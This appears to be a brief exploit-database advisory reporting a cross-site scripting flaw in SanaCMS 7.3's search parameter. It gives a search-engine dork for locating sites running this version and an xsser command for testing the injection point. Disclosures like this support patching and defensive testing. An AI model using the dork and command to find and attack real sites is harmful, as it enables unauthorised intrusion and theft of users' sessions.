##### #Exploit Title: SANADATA | SanaCMS 7.3 Cross Site Scripting #Exploit Author: Hosein Askari #Vendor HomePage: https://www.sanadata.com/| #Version : 7.3 #Dork : intext:"SANADATA | SanaCMS 7.3" #Tested on:Parrot OS #Date: 3-2-2017 #Category: webapps #Vulnerability Path : http://127.0.0.1/fa/index.asp?p=search&search= #Command For Testing: #xsser -u "http://127.0.0.1/en/index.asp?p=search&search=" # Author Mail :hosein.askari@aol.com #####